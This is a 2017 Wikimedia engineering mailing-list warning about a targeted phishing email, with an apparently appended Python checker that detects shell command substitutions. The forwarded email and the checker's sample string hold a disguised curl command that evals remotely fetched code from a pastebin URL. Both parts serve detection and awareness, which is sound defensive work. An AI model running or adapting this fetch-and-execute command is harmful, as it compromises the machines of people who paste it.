[Engineering] PLEASE READ: (unsuccessful) compromise attempt

Faidon Liambotis faidon at wikimedia.org
Thu Jun 15 19:12:23 UTC 2017


Hi,

DO NOT RUN THE COMMAND BELOW. Please read this email in full.

I just got an email, found below, which seems initially legitimate, but
on a more careful read is malicious and an attempt to compromise my
computer. Thankfully I don't have the habit of copy/pasting commands on
my terminal and I read this email carefully, so I was not a victim of
this.

The email seems innocuous enough, by mentioning my name and an otherwise
legitimate body pointing out an API issue with a URL that looks like an
api.php URL of ours. It suggests running a curl to reproduce, but if you
look more carefully, that curl has $(eval $(curl
https://pastebin.com/raw/xSWbdNAK) in it.

That pastebin URL above contains an exec() of a base64 string, which, in
turn, decoded, is a Python script that fetches and exec()s the contents
of a URL. I have NOT fetched that URL yet, so I don't know what the
contents are. I'd advise not doing that either, unless done carefully
from a sandboxed, unprivileged environment. It will also likely let the
attacker know that someone accessed it, and possibly let them know that
we're on to them.

Please be on the lookout for similar attempts, and let security@ and ops
know immediately if you get similar ones, or if you are suspicious of
any other emails or weird behavior on your computer. Please also let us
know IMMEDIATELY if you suspect you fell victim to one of these attacks.
Make sure to confirm that your message was received. If in doubt, call
me or other opsens on our cellphones, as found on officewiki's
Contact_list.

We also had a targeted phishing attempt last week, by someone purporting
to be Katherine and attempting to extract donor data, so it's possible
it's the same person trying a different angle. They may try other
angles as well, so I'd advise everyone to be vigilant.

Best,
Faidon
--
Faidon Liambotis
Principal Operations Engineer
Wikimedia Foundation



----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com> -----

Date: Thu, 15 Jun 2017 10:45:35 -0700
From: Joshua Wilson <joshuaswillson at gmail.com>
To: fliambotis at wikimedia.org
Subject: Wikipedia REST API Issues

Greetings Faidon,


It seems as if the api `query` endpoint at the English Wikipedia is down. A
simple "hello" api call as shown below responds with an internal server error.
Further calls to the same endpoint result in the request timing out, until the
endpoint is reachable again.

[added by faidon: DO NOT RUN THIS COMMAND]
curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval $(curl
https://pastebin.com/raw/xSWbdNAK)
\\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
[added by faidon: DO NOT RUN THIS COMMAND]

I'm interested in using english wikipedia data for some AI language
comprehension research.

If you could take a look, and possibly let me know if/when this service
will be up, I would greatly appreciate it. I couldn't find any scheduled
downtime information online, so I apologize if this behavior is expected.

Thanks,

Chelsea Anders

----- End forwarded message -----
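The trick in the forwarded message relies on the shell expanding `$(...)` before curl ever sees the URL, so whatever is inside the substitution runs with the privileges of whoever pastes the line. The following is an added example, not part of the original thread or of any Wikimedia tooling: a small Python pre-paste check that pulls out every `$(...)` and backtick substitution from a command (honouring backslash escapes), flags `eval` and remote fetches inside them, and lists the hosts that would be contacted silently. The function and variable names are mine; the sample command is the one from the forwarded email, treated purely as data and never handed to a shell.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the command from the forwarded email, joined onto one
# line. It is inspected as a string here and is never executed.
SAMPLE_COMMAND = (
    r"curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval $(curl "
    r"https://pastebin.com/raw/xSWbdNAK) \\\&)Main%20Page\&prop=revisions"
    r"\&rvprop=content\&format=json"
)

# Benign control: the same API call without any substitution.
BENIGN_COMMAND = (
    "curl 'https://en.wikipedia.org/w/api.php?action=query&titles=Main%20Page"
    "&prop=revisions&rvprop=content&format=json'"
)

FETCHERS = re.compile(r"\b(curl|wget|fetch)\b")
URL_RE = re.compile(r"https?://\S+")


def extract_substitutions(cmd):
    """Return the body of every $(...) and `...` in cmd, innermost first.

    The shell performs these substitutions before the outer program runs, so
    their contents execute regardless of how harmless the surrounding text looks.
    """
    found = []
    stack = []  # indices just past each "$(" that has not been closed yet
    i = 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == "\\":  # backslash escapes the next character: skip both
            i += 2
            continue
        if cmd.startswith("$(", i):
            stack.append(i + 2)
            i += 2
            continue
        if ch == ")" and stack:
            found.append(cmd[stack.pop():i])
        elif ch == "`":
            end = cmd.find("`", i + 1)
            if end != -1:
                found.append(cmd[i + 1:end])
                i = end
        i += 1
    return found


def hosts_contacted(cmd):
    """Hosts named inside substitutions, i.e. servers reached before curl runs."""
    hosts = set()
    for body in extract_substitutions(cmd):
        for url in URL_RE.findall(body):
            host = urlparse(url.rstrip(")")).hostname
            if host:
                hosts.add(host)
    return hosts


def audit_command(cmd):
    """Return (severity, message) findings; an empty list means no substitution
    was found, not that the command is safe."""
    findings = []
    for body in extract_substitutions(cmd):
        findings.append(("warn", f"shell substitution would run: {body}"))
        if re.search(r"\beval\b", body):
            findings.append(("critical", "eval inside substitution: fetched output is run as shell code"))
        if FETCHERS.search(body):
            findings.append(("critical", f"remote content fetched inside substitution: {body}"))
    return findings


def safe_to_paste(cmd):
    """True only when no substitution of any kind is present."""
    return not extract_substitutions(cmd)


if __name__ == "__main__":
    for label, cmd in (("sample", SAMPLE_COMMAND), ("benign", BENIGN_COMMAND)):
        print(f"== {label}: safe_to_paste={safe_to_paste(cmd)}")
        for sev, msg in audit_command(cmd):
            print(f"  [{sev}] {msg}")
        print("  hosts reached via substitution:", sorted(hosts_contacted(cmd)))
```

Run it over any command you are about to paste from an email or chat; anything that comes back with a `critical` finding deserves a read in a text editor first, and the host list tells you which third-party server (here, pastebin.com) would receive a request the moment the line is pasted.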


